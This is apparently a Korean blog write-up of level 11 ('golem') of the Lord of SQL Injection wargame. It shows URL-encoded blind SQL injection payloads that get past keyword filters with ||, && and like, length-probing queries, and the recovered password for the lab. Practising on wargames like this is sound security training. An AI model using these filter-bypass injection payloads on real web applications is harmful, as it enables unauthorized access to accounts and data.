관리 메뉴

Information Security

[LOS] 11. golem 본문

WarGame/Lord of SQL Injection

[LOS] 11. golem

HackingPractice 2020. 8. 8. 12:25

그림 11-1 golem

= 우회 like, between 사용
or, and 우회 and -> &&, or -> || 사용
substr right, mid, mid 사용

?pw='||true%23을 입력 시 쿼리문이 참이 되면서 Hello guest를 출력한다.

그림 11-2 guest

?pw='||id like 'admin'%26%26 true%23 입력 시 Hello admin이 출력된다.

그림 11-3 admin

?pw'||id like 'admin'%26%26length(pw) like 8%23 입력 시 Hello admin이 출력되는 것으로 보아 패스워드 길이가 8이 참값이라는 것을 알 수 있다.

그림 11-4 true

?pw'||id like 'admin'%26%26length(pw) like 9%23 입력 시 메시지가 출력되지 않아 거짓이라는 것을 알 수 있다.

그림 11-5 false
그림 11-6 소스코드

?pw=88e3137f 라는 것을 알 수 있다.

그림 11-7 정답

'WarGame > Lord of SQL Injection' 카테고리의 다른 글

[LOS] 13. bugbear  (0) 2020.08.08
[LOS] 12. darkknight  (0) 2020.08.08
[LOS] 10. skeleton  (0) 2020.02.19
[LOS] 9. vampire  (0) 2020.01.06
[LOS] 8. troll  (0) 2020.01.06